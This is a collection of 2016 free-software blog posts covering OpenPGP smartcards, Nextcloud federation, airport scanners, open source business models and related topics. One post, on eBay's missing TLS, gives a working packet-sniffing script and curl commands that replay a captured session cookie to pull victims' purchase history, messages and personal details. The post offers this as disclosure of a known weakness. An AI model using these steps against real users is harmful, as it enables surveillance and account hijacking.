This is one of those tools that when you first try it out you simply go “Dear $deity, finally! Why Whhhhyyyyy haven’t I used this before …so many needlessly lost hours with SSH timing out …oh, so many.”

hook out → coming soon: Armbian on Olimex Lime 2 to replace (most) of my current Gentoo on DreamPlug

Thursday, 15 December 2016

Starting to use the Fellowship Card

vanitasvitae's blog » englisch | 13:00, Thursday, 15 December 2016

I recently became a fellow of the FSFE and so I received a nice letter containing the FSFE fellowship OpenPGP smartcard.

After a quick visual examination I approved the card to be *damn cool*, even though the portrait format of the print of it still confuses me when I look at it. I especially like, how optimistically many digits the membership number field has (we can do it!!!). What I don’t like, is the non-https link on the bottom of the backside.

But how to use it now?

It took me some time to figure out, what that card exactly is. The FSFE overview page about the fellowship card misses the information, that this is a OpenPGP V2 card, which might be handy when choosing key sizes later on. I still don’t know, whether the card is version 2.0 or 2.1, but for my usecase it doesn’t really matter. So, what exactly is a smart-card and what CAN I actually do with it?

Well, OpenPGP is a system that allows to encrypt and sign emails, files and other information. That is and was nothing new to me, but what actually was new to me is the fact, that the encryption keys can be stored elsewhere than on the computer or phone. That intrigued me. So why not jump right into it and get some keys on there? – But where to plug it in?

My laptop has no smart-card slot, but there is that big ugly slit at one side, that never really came to value for me, simply because most peripherals that I wanted to connect to my computer, I connected via loved USB. It’s an ExpressCard slot. I knew that there are extension cards that can be fit in there, so they aren’t in the way (like eg. a USB dongle would be). There must be smart-card readers for ExpressCards, right? Right. And since I want to read mails when I’m on a train or bus, I’d find it convenient, when the card reader vanishes inside my laptop.

So I went online and searched for ExpressCard smart-card readers. I ended up buying a Lenovo Gemplus smart-card reader for about 25€. Then I waited. After half an hour I asked myself, if that particular device would work well with GNU/Linux (I use Debian testing on my ThinkPad), so I did some research and reassured me, that there are free drivers. Nice!

While I waited for my card to arrive, I received another letter with my admin pin for the card. Just for the record ;)

Some days later the smart-card reader arrived and I happily shoved it into the ExpressCard slot. I inserted the card and checked via

gpg –card-status

what’s on the card, but I got an error message (unfortunately I don’t remember what exactly it was) about that there was no card available. So I did some more research and it turns out I had to install the package

pcscd

to make it work. After the installation, my smart-card was detected, so I could follow the FSFEs tutorial on how to use the card. So I booted into a live Ubuntu that I had laying around, shut off the internet connection, realized that I needed to install pcscd here as well, reactivated the internet, installed pcscd and disconnected again. At that point in time I wondered, what exact kind of OpenPGP card I had. Somewhere else (forgot where) I read, that the fellowship card is a version 2.0 card, so I could go full 4096 bit RSA. I generated some new keys, which took forever! While I did so, I wrote some nonsense stories into a text editor to generate enough entropy. It still took about 15 minutes for each key to generate (and a lot of nonsense!). What confused me, was the process of removing secret keys and adding them back later (see the tutorial.)

But I did it and now I’m proud owner of a fully functional OpenPGP smart-card + reader. I had some smaller issues with an older GPG key, that I simply revoked (it was about time anyway) and now everything works as intended. I’m a little bit sad, because nearly none of my contacts uses GPG/PGP, so I had to write mails to myself in oder to test the card, but that feel when that little window opens, asking me to insert my card and/or enter my pin pays up for everything :)

My main usecase for the card became signing git commits though. Via

git commit -S -m “message”

git commits can be signed with the card (works with normal gpg keys without a card as well)! You just have to add your keys fingerprint to the .gitconfig. Man, that really adds to the experience. Now every time I sign a commit, I feel as if my work is extremely important or I’m a top secret agent or something. I can only recommend that to everyone!

Of course, I know that I might sound a little silly in the last paragraph, but nevertheless, I hope I could at least entertain somebody with my first experiences with the FSFE fellowship card. What I would add to the wish list for a next version of the card is a little field to note the last digits of the fingerprint of the key thats stored on the card. That could be handy for remembering the fingerprint when there is no card reader available. Also it would be quite nice, if the card was usable in combination with smart-phones, even though I don’t know, how exactly that could be accomplished (maybe a usb connector on the card?)

Anyways that’s the end of my first blog post. I hope you enjoyed it. Btw: My GPG key has the ID 0xa027db2f3e1e118a :)

Edit: This is a repost from october. In the mean time, I lost my admin pin, because I generated it with KeePassX and did not click on “accept” afterwards. That’s a real issue that should be addressed by the developers, but thats another story. I can still use the card, but I can’t change the key on it, so some day I’ll have to order a new card.

vanitasvitae

Tuesday, 13 December 2016

Rename This Project

Paul Boddie's Free Software-related blog » English | 17:35, Tuesday, 13 December 2016

It is interesting how the CPython core developers appear to prefer to spend their time on choosing names for someone else’s fork of Python 2, with some rather expansionist views on trademark applicability, than on actually winning over Python 2 users to their cause, which is to make Python 3 the only possible future of the Python language, of course. Never mind that the much broader Python language community still appears to have an overwhelming majority of Python 2 users. And not some kind of wafer-thin, “first past the post”, mandate-exaggerating, Brexit-level majority, but an actual “that doesn’t look so bad but, oh, the scale is logarithmic!” kind of majority.

On the one hand, there are core developers who claim to be very receptive to the idea of other people maintaining Python 2, because the CPython core developers have themselves decided that they cannot bear to look at that code after 2020 and will not issue patches, let alone make new releases, even for the issues that have been worthy of their attention in recent years. Telling people that they are completely officially unsupported applies yet more “stick” and even less “carrot” to those apparently lazy Python 2 users who are still letting the side down by not spending their own time and money on realising someone else’s vision. But apparently, that receptivity extends only so far into the real world.

One often reads and hears claims of “entitlement” when users complain about developers or the output of Free Software projects. Let it be said that I really appreciate what has been delivered over the decades by the Python project: the language has kept programming an interesting activity for me; I still to this day maintain and develop software written in Python; I have even worked to improve the CPython distribution at times, not always successfully. But it should always be remembered that even passive users help to validate projects, and active users contribute in numerous ways to keep projects viable. Indeed, users invest in the viability of such projects. Without such investment, many projects (like many companies) would remain unable to fulfil their potential.

Instead of inflicting burdensome change whose predictable effect is to cause a depreciation of the users’ existing investments and to demand that they make new investments just to mitigate risk and “keep up”, projects should consider their role in developing sustainable solutions that do not become obsolete just because they are not based on the “latest and greatest” of the technology realm’s toys. If someone comes along and picks up this responsibility when it is abdicated by others, then at the very least they should not be given a hard time about it. And at least this “Python 2.8″ barely pretends to be anything more than a continuation of things that came before, which is not something that can be said about Python 3 and the adoption/migration fiasco that accompanies it to this day.

Cloud Federation – Getting Social

English – Björn Schießle's Weblog | 10:45, Tuesday, 13 December 2016

Clouds getting Social

Clouds getting Social

With Nextcloud 11 we continue to work on one of our hot topics: Cloud Federation. This time we focus on the social aspects. We want to make it as easy as possible for people to share their contact information. This enabled users to find each other and to start sharing. Therefore we extended the user profile in the personal settings. As the screenshot at the top shows, users can now add a wide range of information to their personal settings and define the visibility for each of them by clicking on the small icon next to it.

Privacy first

Change visibility of personal settings

Change visibility of personal settings

We take your privacy serious. That’s why we provide fine grained options to define the visibility of each personal setting. By default all new settings will be private and all settings which already exists before will have the same visibility as on Nextcloud 10 and earlier. This means that the users full name and avatar will only be visible to users on the same Nextcloud server, e.g. through the share dialog. If enabled by the administrator, this values, together with the users email address, will be synced with trusted servers to allow users from trusted servers to share with each other seamlessly.

As shown at the screenshot at the right we provide three levels of visibility: “Private”, “Contacts” and “Public”. Private settings will be only visible to you, even users on the same server will not have access to it. The only exceptions are the avatar and the full name because this are central data used at Nextcloud for activities, internal shares, etc. Settings which are set to “Contacts” will be shared with users on the same server and trusted servers, defined by the administrator of the Nextcloud server. Public data will be synced to a global and public address book.

Introducing the global address book

The best real world equivalent to the global address book is a telephone directory. For a new phone number people can chose to publish their phone number together with their name and address to a public telephone directory to enable other people to find them. The global address book follows the same pattern. By default nothing gets published to the global address book. Only if the user sets at least one value in their personal settings to “Public”. In this case all the public data will be synced to the global address book together with the users Federated Cloud ID. Users can remove their data at any time again by simply setting their personal data back to “Contacts” or “Private”.

In order to use the global address book as a source to find new people, this lookup needs to be enabled explicitly in the “Federated Cloud Sharing” settings by the administrator. For privacy reasons this is disabled by default. If enabled the share dialog of Nextcloud will query the global address book every time a user wants to share a file or folder, and suggest people found in the global address book. In the future there might be a dedicated button to access the global address book, both for performance reasons and to make the feature more discoverable.

Future work

The global address book can return many results for a given name. How do we know that we share with the right person? Therefore we want to add the possibility to verify the users email address, website and Twitter handle in Nextcloud 12. As soon as this feature is implemented the global address book will only return users where at least one personal setting is verified and also visualize the verified data so that the user can use this information to pick the right person.

Further, I want to extend the meaning of “Contacts” in one of the next versions. The idea is that “Contacts” should not be limited to trusted servers but include the users personal contacts. For example the data set to “Contacts” could be shared with every person to which the user already established at least one federated share successfully, or to all contacts with a Federated Cloud ID in the users personal address book. This way we will move slowly in the direction of some kind of decentralized and federated social network based on the users address book. This will also enable users to easily push their new phone number or other personal data to all their friends and colleagues, things for which most people use centralized and proprietary services like so called “business networks” these days.

Another interesting possibility, made possible by the global address book is to move complete user accounts from one server to another. Given that the user published at least some basic information on the global address book, they could use it to announce their move to another server. Other Nextcloud servers could find this information and make sure that existing federated shares continue to work.

Saturday, 10 December 2016

The Internet of Dangerous Auction Sites

Iain R. Learmonth | 21:25, Saturday, 10 December 2016

It might be that the internet era of fun and games is over, because the internet is now dangerous. – Bruce Schneier

Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives’ Energy & Commerce Committee about computer security after the Dyn attack. I’m including this quote because I feel it sets the scene nicely for what follows here.

Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment, I considered that maybe my traffic was being intercepted deliberately, there’s no way that eBay as a global company would be deliberately risking users in this way. I was wrong. There is not and has never been TLS for large swathes of the eBay site. In fact, the only point at which I’ve found TLS is in their help pages and when it comes to entering card details (although it’ll give you back the last 4 digits of your card over a plaintext channel).

sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser `whoami` wireshark
# Log out and in again to assume the privileges you've granted yourself

What can you see?

They first thing I’d like to call eBay on is a statement in their webpage about Cookies, Web Beacons, and Similar Technologies:

We don’t store any of your personal information on any of our cookies or other similar technologies.

Well eBay, I don’t know about you, but for me my name is personal information. Ana, who investigated this with me, also confirmed that her name was present on her cookie when using her account. But to answer the question, you can see pretty much everything.

Using the Observer module of PATHspider, which is essentially a programmable flow meter, let’s take a look at what items users of the network are browsing:

sudo apt install pathspider

The following is a Python 3 script that you’ll need to run as root (for packet capturing) and will need to kill with ^C when you’re done because I didn’t give it an exit condition:

import logging
import queue
import threading
import email
import re
from io import StringIO

import plt

from pathspider.observer import Observer

from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete

def tcp_reasm_setup(rec, ip):
        rec['payload'] = b''
        return True

def tcp_reasm(rec, tcp, rev):
        if not rev and tcp.payload is not None:
                rec['payload'] += tcp.payload.data
        return True

lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile("(?:item=|itm(?:\/[^0-9][^\/]+)?\/)([0-9]+)")

o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()

while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))

Note: PATHspider’s Observer won’t emit a flow until it is completed, so you may have to close your browser in order for the TCP connection to be closed as eBay does use Connection: keep-alive.

If all is working correctly (if it was really working correctly, it wouldn’t be working because the connections would be encrypted, but you get what I mean…), you’ll see something like:

INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116

It is left as an exercise to the reader to map the IP addresses to users. You do however have the hint that the first name of the user is in the cookie.

This was a very simple example, you can also passively sniff the content of messages sent and recieved on eBay (though I’ll admit email has the same flaw in a large number of cases) and you can also see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend you similar items and then those recommendations would also be available to anyone viewing the traffic at your workplace.

Perhaps you want to see the purchase history but you’re too impatient to wait for the user to view the purchase history screen. Don’t worry, this is also possible.

Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay.

Yes, it’s 2016, nearly 2017, and cookie hijacking is still a thing.

You may remember Firesheep, a Firefox plugin, that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk of session hijacking vulnerabilities to users of web sites that only encrypt the login process and not the cookie(s) created during the login process. Six years later and eBay has not yet listened.

So what is cookie hijacking all about? Let’s get hands on. This time, instead of looking at the request line, look at the Cookie header. Just dump that out. Something like:

print(headers['Cookie'])

Now you have the user’s cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and…

sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html

I’m sure you can use your imagination for more. One of my favourites is…

# Get the personal information
curl --cookie "$COOKIE" http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK > personal.html

This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account.

The techniques I’ve shown here do not seem to care where the request comes from. We tested using my cookie from Ana’s laptop and also tried from a server hosted in the US (our routing origin is in Germany so this should have perhaps been a red flag). I could not find any interface through which I could query my login history, I’m not sure what it would have shown.

I’m not a security researcher, though I do work as an Internet Engineering researcher. I’m publishing this as these vulnerabilities have already been disclosed in the paper I linked above and I believe this is something that needs attention. Every time I pointed out to someone that eBay does not use TLS over the last week they were suprised, and often horrified.

You might think that better validation of the source of the cookie might help, for instance, rejecting requests that suddenly come from other countries. As long as the attacker is on the path they have the ability to create flows that impersonate the host at the network layer. The only option here is to encrypt the flow and to ensure a means of authenticating the server, which is exactly what TLS provides.

You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale.

Please Internet, TLS already.

Tuesday, 06 December 2016

Rejection of voluntary naked scanner at airport

Matthias Kirschner's Web log - fsfe | 23:17, Tuesday, 06 December 2016

On my travel to the OGP summit in Paris I experienced how it works when you reject the voluntary naked scanner/body scanner. There are signs before security that this scan is voluntary and that you should tell the security personnel if you do not want it. That is what I did, and here my memorandum of what happened at Berlin Schönefeld this morning.

Naked Scanner

I asked the first security officer which queue I have to use if I do not want to use the naked scanner (~7:25am). He said I have to use it. After I told him that on the signs it is written that it is voluntary, he explained me that it is not really a naked scanner, but that they just see a contours of the body. We agreed that I will talk with the other officers who operate the machines.

After unpacking my laptop and liquids, I told the other security officer that I prefer the "manual treatment" (that is how they call it on the signs). He referred me to the colleague operating the machine. I was asked why I do not want it, and I said because data protection. Then I got the "manual control" which means that someone is doing the normal body massage. Afterwards they directly tested my clothing for signs of explosives.

Then the second officer brought me to my luggage, and asked me to unpack everything to have another scan of my belongings. During that he asked me why I refused the "body scanner" and there was some back and forth. As always I stayed friendly all the time, as I know that for the officers my behaviour meant more work, and that they are following orders. He explaining me they just see the contours and nothing else. I told him, that I do not trust what data of my body shape is saved and where it is stored. During the talk I also told him that what they see on their screens, and what is saved on the disk can be different things, and that just because they cannot access files from before does not mean they are not stored.

In the talk he explained me that they have to ask for the reasons why I am not doing the (see above "voluntary") check, and evaluate if this is plausible or if I am covering-up something. Pregnancy or implants would be a plausible reason. When I asked about data protection he said that is not a plausible reason, and that in such cases they would also have to ask the police to check you again.

After my luggage was scanned the second time, and I had all my belongings in the bag again they said they will now have to do the testing for signs of explosives. I told them that I was already checked for that, but they said that now my luggage will be checked. Well, so be it, another check and I can assure you that I am now quite sure that neither I nor my belongings I were in contact with explosives recently.

In the end the officer urged me to please inform myself again about the scanner to prevent such long procedures in future. Actually it was not that long, the procedure was over at ~7:45am. I wished them a nice day, left and wrote this blog post. I have to say I am concerned how people have to justify something which is supposed to be voluntary.

Now preparing the meeting in Paris...


Update 2016-12-09 14:24: I received many interesting comments about this post, especially on the corresponding tweet and in the comments on the BoingBoing article. Thanks to all of you who shared their experience and ideas on the subject there or by e-mail.

Documenting DUCK

David Boddie - Updates (Full Articles) | 17:35, Tuesday, 06 December 2016

Having recently considered restarting work on my Dalvik compiler tools, I thought I should at least try and improve some of the documentation that accompanies the project, beginning with the example applications.

The examples are written in a Python-like language that I called Serpentine. Programs written in this language are syntactically valid Python source code, but they wouldn't run in a Python interpreter even if you had a set of replacement modules for all the Java and Android libraries. (As an aside, my brother wrote a partial set of compatiblity modules for the Java standard library as part of his javaclass project many years ago.) The incompatibility between the languages is intentional. I wanted to be able to write programs that would be represented using as few virtual machine instructions as possible and, since the virtual machine is designed for a statically-typed language with primitive types, I was comfortable with imposing restrictions on how the language uses types to make the compilation process as simple as possible.

It would be possible to implement more dynamic, Python-like types on top of the primitive types but this could lead to inefficiencies at run-time or, at the very least, a more complicated compiler. Since the overall goal was to have a language that resembled Python enough to make Android programming familiar to a Python programmer, implementing all the semantic features of Python is not really a priority, especially since programmers have to face up to the platform APIs at some point.

Inline Documentation

One of the other areas where I decided to experiment with non-Python-like behaviour is in the use of docstrings, the short text descriptions that follow the start of modules, classes and functions. These are handled specially by the standard Python parser so that they don't get mixed into the code that the CPython interpreter wants to run. However, when parsing code for other purposes, this can be a bit of a disadvantage. One thing I wanted to do was to interleave descriptive strings throughout a program and process them to create a document that combines text and source code. Having the docstrings stored separately from other nodes in an abstract syntax tree makes the task of doing this processing a bit more tedious since we need to work out where the original strings were in the source code.

The Mercurial repository for the project is currently residing on Bitbucket, which is less than ideal from a Free Software perspective. However, we can take advantage of the service's Markdown support to automatically render files marked up in this language. Since Markdown tends to be supported by other services and tools, we are not locked into this service and could easily migrate the repository elsewhere, processing the documentation differently if required. Since Markdown is not so different to reStructuredText, we could even just generate documentation using Sphinx with not too much effort.

The end result is that inline text from the examples is interleaved with the source code to produce text in Markdown format. When the contents of the repository are viewed in a browser, this text is processed and rendered as regular HTML by the hosting service, making it easier to read about the examples provided with the compiler.

Although I haven't used this approach for the compiler itself, I think that it might be interesting to try it. The style of documentation I am used to writing is focused on how programmers use library APIs, but documenting the internal structure of a project is a different kind of task. Perhaps I'll experiment with a combination of the two approaches to try and get the best of both worlds.

Categories: Free Software, Android, Documentation

Saturday, 03 December 2016

Conquer the World with Open Source

Blog – Think. Innovation. | 15:38, Saturday, 03 December 2016

Last week I had the privilege and pleasure to do a talk at the Open Source Software and Hardware Congres (OSSH Event) in Den Bosch, The Netherlands. Since I got some positive reactions on this talk, I decided to write this Blog Post about it, containing the main points.

The organization asked me to talk about “earning money with Open Source”, a topic I have been talking about at several other conferences. However, this time I decided not to just focus on explaining various Open Source Revenue Models, but instead focus more on the disruptive global successes an Open Source Strategy can bring about. Therefor the somewhat grandiose title of my talk: Conquer the World with Open Source.

In the talk I aimed at explaining how some very successful companies have been hugely successful by choosing the unconventional way, by having the guts to do it differently and adopting Open Source as a Strategy. What I mean by this is that Open Source forms a vital part of the Value Proposition of a company. This opposed to mere regarding and using Open Source Software (and increasingly Hardware) as an alternative to Proprietary products for running your business.

Remark: most of the rest of the talks at OSSH were about the pros and cons of using Open Source Software in a regular business, including a lot about security-related matters. Interesting exceptions were the talk by RedHat about Internet of Things and by Smart Robotics about ROS Open Source Robotics.

My talk included three case studies of “Big Conquerers”, from Open Source Software, three case studies of “Small Conquerers”, from the upcoming Open Source Hardware movement and some tips for those who are interested in becoming an Open Source Conquerer.

The Big Conquerers in Open Source Software

As the Innovation Model of Open Source was invented as a Software Development and Distribution practice and has been around for a long time, this is where the biggest successes can be found:

“Build a Multinational with Open Source” (RedHat)

RedHat has shown that building a multinational company is possible and its clients, employees and the entire community are benefiting from their success. This year (2016) RedHat will make over $2 billion revenue, being the first Open Source company to do so.

Starting in 1993, it now has 9300 employees and serves its customers in 35 countries. For this unfamiliar with the company: RedHat mainly provides support and services around Open Source Software like GNU/Linux, but also provides Cloud and IoT solutions, consultancy and training.

“Become Market Leader by adopting an Open Source Strategy” (Android)

About a decade ago (2007) Google released its first version of the Open Source Operating System for smartphones: Android. Seeing the vastly growing market for mobile phones and particularly smartphones, Google decided it could not afford to leave out and chose an Open Source strategy.

The result: as Apple’s iOS starting pushing away Palm, BlackBerry and Windows, the market leaders at the time, Android overtook iOS in just a couple of years. And at the moment almost 90% of all smartphones sold run on an Open Source OS, with GNU/Linux at the core.

However, some critical remarks can also be made about Google’s strategy for Android. Google is making more and more of the apps that used to be Open Source as a Proprietary component of the OS and the company has a serious lock-down on all companies producing phones with Android and Google’s flagship apps like GMail, Google Play and Google Maps with the Open Handset Alliance. Well, not so Open actually, for example: if a company produces phones with these flagship apps, they have to include ALL of them and are forbidden to produce phones that run a fork (another version) of Android.

“Make Global Impact by Open Sourcing your Product” (WordPress)

It was 2003 and the market of Content Management Systems (CMS) was still highly volatile and in tremendous development. In that time it was still normal to build your own (general purpose) CMS, or at least consider the possibility. WordPress changed that, by becoming the best CMS around and Open Sourcing it to make a global impact.

At the moment 25% of the top 10 million websites run WordPress and the ecosystem of premium themes, plug-ins, customizations and implementations is said to be a ‘Billion Dollar Ecosystem’, although it is very hard to calculate this number given the distributed non-centralized nature of Open Source.

The Software as a Service (SaaS) version of the CMS, which is wordpress.com, serves 76 million blogs. It is amazing how WordPress, or Automattic, the company behind this product, has been able to make all of this possible and has just around 400 employees.

By comparison: Twitter has 10 times as many employees and Facebook 40 times.

The Small Conquerers in Open Source Hardware

Given the success of Open Source in Software, we now see ‘a transition from bits to atoms’ where this innovation model is being experimented with, being tested and eventually being re-invented to be compatible and successful with Hardware. Some very promising Open Source Hardware companies exist nowadays and we can learn a lot and get inspiration from these cases:

“Define the de-facto Standard” (Arduino)

A little over 10 years ago (2005) a group of researchers and university students in Italy were looking for a way to allow their students to quickly include electronics in their art projects. At that time one needed to be a trained embedded systems engineer and a software engineer if you wanted to do some more advanced things with electronics.

For this reason the group developed a small basic micro-controller board which could be easily connected and extended with modules. Furthermore, they built a program to be able to easily develop software for it, called an Integrated Development Environment (IDE).

The Arduino project was born and the group soon saw a huge demand for the product coming from everywhere. They decided to start producing and selling the Arduino products in larger quantities, expanding globally. Also, because all of the designs, documentation and code were Open Source, many clones came onto the market, hoping to be in the slipstream of this success.

Today Arduino is the de-facto standard for any educational, art, hobby and even professional electronics prototyping project, especially given the huge IoT hype. The Arduino project is believed to have made around € 50 million revenue to date and the webshop Adafruit sells € 250.000 in Arduino products each month. And note: these are the official, original or certified Arduino products, not the clones, which are a multitude of that.

“Disrupt the Supply Chain” (OpenDesk)

OpenDesk is an interesting case as it is trying to build an open platform for furniture, mainly desks and tables, where the client directly connects with the designer and maker. The idea is that only information is transported globally and the physical products are made locally by manufacturers called ‘makers’ using computer controlled machinery, like CNC Routers.

A client requests a desk to be made and a request for proposal goes out to local makers. Then when the client decides to buy the product, the local maker is going to make it, where every party involved gets a piece of the financial pie. The designer, the platform, the channel, the maker are all paid a fair share.

OpenDesk calls itself the “IKEA of the 21st century”, but since the furniture price is a multiple of IKEA furniture, I think it is mainly an interesting experiment to figure out how to make this rather complicated Open Source platform model work.

A side note: the designers choose the license to share their work under and most of them choose to use a ‘non-commercial’ license, which means that most of OpenDesk’s designs are not Open Source.

“Overtake the Big Boys” (The Things Network)

A few years ago a conglomerate of multinational corporations decided to set a new standard for Machine to Machine (M2M) communications, to be able to service the upcoming Internet of Things industry. This conglomerate is called the LoRa Alliance and the communication protocol is released as an open standard.

Then in 2015 a small group of people in Amsterdam decided to take advantage of this openness and were able to set up a city-wide network in just six weeks, with a relatively small amount of investment. The initiative was a huge success and got tons of media attention: The Things Network (TTN) was born.

Now TTN defines itself as a distributed community-owned open source IoT network. The movement has expanded globally, forming local communities everywhere. At the moment the community spans 60 countries, with over 200 communities, having a total of 900 active gateways.

Their Kickstarter campaign, aiming to bring their own developed cheap hardware on the market, was a huge success, bringing in almost € 300,000, twice the intended amount.

Recently TTN announced a deal with Farnell, the global distributor of Raspberry Pi, to distribute their products as well. I think KPN and other corporations are jealously looking at what TTN has accomplished as a grass-roots open source movement and wish they had started this amazing concept.

Become an Open Source Conquerer

After reading about the successes of these six Open Source Conquerers, I hope you get inspiration to at least consider this unconventional approach to make your innovative idea a worldwide success! We can learn a lot by studying these companies and in case you are still wondering:

“But how do I make money with Open Source?” here is a list of the options you have:

Sell or rent out physical products
Sell products and services made with Open Source products
Sell per-client installations and customizations
Sell the means to use Open Source
Sell education and consultancy
Sell proprietary premium products
Sell the franchise and certification
Organize events and sell tickets
Benefit from ‘open’-oriented subsidies and (research) grants
Start a foundation or consortium

Basically you sell products and services just as any traditional ‘closed’ company, except that you cannot sell licensed to intellectual property like patents. This list is an adaptation from Lars Zimmerman’s excellent article about the topic.

“Be Fair, do not OpenWash!”

When you are going for Open Source, I recommend you to do it properly and in a fair way. Do not market and promote “Open Source”, when it in fact is not. Stick to the widely accepted Open Source Software Definition by the Open Source Initiative and the Open Source Hardware Definition by the Open Source Hardware Association.

If you play tricks I call this “Openwashing” and it can and probably will explode in your face later on. A famous example of this is Makerbot, which several years ago was the market leader for desktop 3D Printers. They had a huge community, which helped them out in many ways and they were developing really innovative printers, completely Open Source. Then somebody decided to take all the ‘source’ (design files, schematics, etc.) and start a Crowdfunding campaign to have clones made in China.

Even though the campaign failed this scared the Makerbot founders enough to make the unwise decision to make Makerbot proprietary. This caused outrage in the community and destroyed their brand. Combined with bringing several low quality 3D Printers on the market, the company is now marginalized and could very well seize to exist soon.

“Think Big, Act Small”

One final advice for when starting out with an Open Source Strategy: “Think Big, Act Small”. Since you probably have no or little experience on the topic and how to make a successful Open Source Business Model, start with small experiments and learn on the way.

Look for example at what Texas Instruments and Intel are doing in this regard: big corporations who tip their toes in the waters of Open Source.

If you are wondering about my experience with Open Source Business Models, then check out Totem Open Health, an initiative I started in 2014 and now continues to conquer the world without me.

Thursday, 01 December 2016

Using a fully free OS for devices in the home

DanielPocock.com - fsfe | 13:11, Thursday, 01 December 2016

There are more and more devices around the home (and in many small offices) running a GNU/Linux-based firmware. Consider routers, entry-level NAS appliances, smart phones and home entertainment boxes.

More and more people are coming to realize that there is a lack of security updates for these devices and a big risk that the proprietary parts of the code are either very badly engineered (if you don't plan to release your code, why code it properly?) or deliberately includes spyware that calls home to the vendor, ISP or other third parties. IoT botnet incidents, which are becoming more widely publicized, emphasize some of these risks.

On top of this is the frustration of trying to become familiar with numerous different web interfaces (for your own devices and those of any friends and family members you give assistance to) and the fact that many of these devices have very limited feature sets.

Many people hail OpenWRT as an example of a free alternative (for routers), but I recently discovered that OpenWRT's web interface won't let me enable both DHCP and DHCPv6 concurrently. The underlying OS and utilities fully support dual stack, but the UI designers haven't encountered that configuration before. Conclusion: move to a device running a full OS, probably Debian-based, but I would consider BSD-based solutions too.

For many people, the benefit of this strategy is simple: use the same skills across all the different devices, at home and in a professional capacity. Get rapid access to security updates. Install extra packages or enable extra features if really necessary. For example, I already use Shorewall and strongSwan on various Debian boxes and I find it more convenient to configure firewall zones using Shorewall syntax rather than OpenWRT's UI.

Which boxes to start with?

There are various considerations when going down this path:

  • Start with existing hardware, or buy new devices that are easier to re-flash? Sometimes there are other reasons to buy new hardware, for example, when upgrading a broadband connection to Gigabit or when an older NAS gets a noisy fan or struggles with SSD performance and in these cases, the decision about what to buy can be limited to those devices that are optimal for replacing the OS.
  • How will the device be supported? Can other non-technical users do troubleshooting? If mixing and matching components, how will faults be identified? If buying a purpose-built NAS box and the CPU board fails, will the vendor provide next day replacement, or could it be gone for a month? Is it better to use generic components that you can replace yourself?
  • Is a completely silent/fanless solution necessary?
  • Is it possibly to completely avoid embedded microcode and firmware?
  • How many other free software developers are using the same box, or will you be first?

Discussing these options

I recently started threads on the debian-user mailing list discussing options for routers and home NAS boxes. A range of interesting suggestions have already appeared, it would be great to see any other ideas that people have about these choices.

Monday, 28 November 2016

Freed-Ora 25 released

Marcus's Blog | 11:13, Monday, 28 November 2016

Freed-Ora is a Libre version of Fedora GNU/Linux which comes with the Linux-libre kernel and the Icecat browser.
freedo
The procedure for creating Live media has changed within Fedora and the image have been build using livemedia-creator instead of livecd-creator. The documentation on how to build the image can be found here.

Please download the Freed-Ora 25 ISO and give feedback.

Friday, 25 November 2016

vmdebootstrap Sprint Report

Iain R. Learmonth | 12:06, Friday, 25 November 2016

This is now a little overdue, but here it is. On the 10th and 11th of November, the second vmdebootstrap sprint took place. Lars Wirzenius (liw), Ana Custura (ana_c) and myself were present. liw focussed on the core of vmdebootstrap, where he sketched out what the future of vmdebootstrap may look like. He documented this in a mailing list post and also presented (video).

